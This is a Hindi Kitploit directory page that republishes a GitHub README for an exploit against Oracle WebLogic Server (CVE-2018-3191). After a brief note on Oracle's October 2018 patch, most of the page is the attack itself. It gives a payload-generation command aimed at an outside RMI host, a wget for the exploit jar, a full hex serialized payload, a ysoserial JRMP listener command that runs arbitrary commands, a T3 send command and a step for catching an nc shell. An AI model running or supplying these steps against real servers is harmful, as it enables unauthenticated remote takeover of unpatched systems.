Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-3191 — CVE-2018-3191 के लिए एक्सप्लॉइट जो Oracle WebLogic Server को T3 प्रोटोकॉल के माध्यम से लक्षित करता है, जो JNDI पेलोड जनरेशन और शेल एक्सेस के लिए RMI लिसनर के साथ अप्रमाणित रिमोट कोड निष्पादन को सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/jas502n/cve-2018-3191
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubjas502n/cve-2018-3191

CVE-2018-3191

CVE-2018-3191 के लिए एक्सप्लॉइट जो Oracle WebLogic Server को T3 प्रोटोकॉल के माध्यम से लक्षित करता है, जो JNDI पेलोड जनरेशन और शेल एक्सेस के लिए RMI लिसनर के साथ अप्रमाणित रिमोट कोड निष्पादन को सक्षम करता है।

रिपॉजिटरी देखें
682537 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Weblogic-CVE-2018-3191 दूरस्थ कोड कमांड निष्पादन भेद्यता

weblogic For Docker वातावरण

0x00 परिचय

बीजिंग समय 17 अक्टूबर को, Oracle द्वारा आधिकारिक रूप से जारी अक्टूबर के महत्वपूर्ण पैच अपडेट CPU (Critical Patch Update) में एक उच्च-जोखिम वाले WebLogic दूरस्थ कोड निष्पादन भेद्यता (CVE-2018-3191) को ठीक किया गया।

यह भेद्यता एक अप्रमाणित हमलावर को T3 प्रोटोकॉल के माध्यम से नेटवर्क एक्सेस करके कमजोर WebLogic Server को भ्रष्ट करने की अनुमति देती है, और सफल शोषण से हमलावर WebLogic Server पर नियंत्रण प्राप्त कर सकता है, जिससे दूरस्थ कोड निष्पादन हो सकता है।

Oracle का आधिकारिक CPU लिंक:

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

आधिकारिक सुधार योजना:

Oracle ने पहले ही अक्टूबर के महत्वपूर्ण पैच अपडेट CPU (Critical Patch Update) में इस भेद्यता को ठीक कर दिया है, और प्रभावित उपयोगकर्ताओं को सुरक्षा के लिए जल्द से जल्द अपग्रेड और अपडेट करने की दृढ़ता से सलाह दी जाती है।

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW

0x01 पेलोड उत्पन्न करें

उपयोग:

`

java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://www.canyouseeme.cc:6668/Jas502n >jas502n.txt

https://github.com/voidfyoo/CVE-2018-3191/releases/download/10.3.6.0/weblogic-spring-jndi-10.3.6.0.jar

wget https://github.com/voidfyoo/CVE-2018-3191/releases/download/12.2.1.3/weblogic-spring-jndi-12.2.1.3.jar

java -jar weblogic-spring-jndi.jar <jndi_address>

उदाहरण:

java -jar weblogic-spring-jndi.jar rmi://192.168.1.1:1099/Exp

weblogic-spring-jndi-12.2.1.3.jar weblogic के लिए:

12.2.1.3

weblogic-spring-jndi-10.3.6.0.jar weblogic के लिए:

10.3.6.0 12.2.1.0 12.1.3.0 12.2.1.1

`

root@kitploit:~
payload(hex):

aced00057372004d636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e6a74612e4a74615472616e73616374696f6e4d616e616765724ef3ecfbb628982f0200085a001a616c6c6f77437573746f6d49736f6c6174696f6e4c6576656c735a001c6175746f6465746563745472616e73616374696f6e4d616e616765725a00196175746f646574656374557365725472616e73616374696f6e5a00146361636865557365725472616e73616374696f6e5a001f757365725472616e73616374696f6e4f627461696e656446726f6d4a6e64694c00167472616e73616374696f6e4d616e616765724e616d657400124c6a6176612f6c616e672f537472696e673b4c00267472616e73616374696f6e53796e6368726f6e697a6174696f6e52656769737472794e616d6571007e00014c0013757365725472616e73616374696f6e4e616d6571007e00017872005e636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e737570706f72742e4162737472616374506c6174666f726d5472616e73616374696f6e4d616e6167657235f8d3063abc94c402000749000e64656661756c7454696d656f75745a001d6661696c4561726c794f6e476c6f62616c526f6c6c6261636b4f6e6c795a0024676c6f62616c526f6c6c6261636b4f6e50617274696369706174696f6e4661696c7572655a00186e65737465645472616e73616374696f6e416c6c6f7765645a0017726f6c6c6261636b4f6e436f6d6d69744661696c75726549001a7472616e73616374696f6e53796e6368726f6e697a6174696f6e5a001b76616c69646174654578697374696e675472616e73616374696f6e7870ffffffff00010100000000000000010101007070740025726d693a2f2f7777772e63616e796f757365656d652e63633a363636382f4a61733530326e

0x02 java RMI सुनें

root@kitploit:~
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 6668 CommonsCollections1 "command"

root@374bb3d9a2d8:/tools# ./rmi.sh 
* Opening JRMP listener on 6668

0x03 T3 पर पेलोड भेजें

python weblogic.py www.canyouseeme.cc 7001 jas502n.txt

0x04 Nc शेल प्राप्त करें

0x05 संदर्भ लिंक

https://github.com/voidfyoo/CVE-2018-3191

YouTube प्रदर्शन वीडियो

CVE-2018-3191

टूल डाउनलोड करें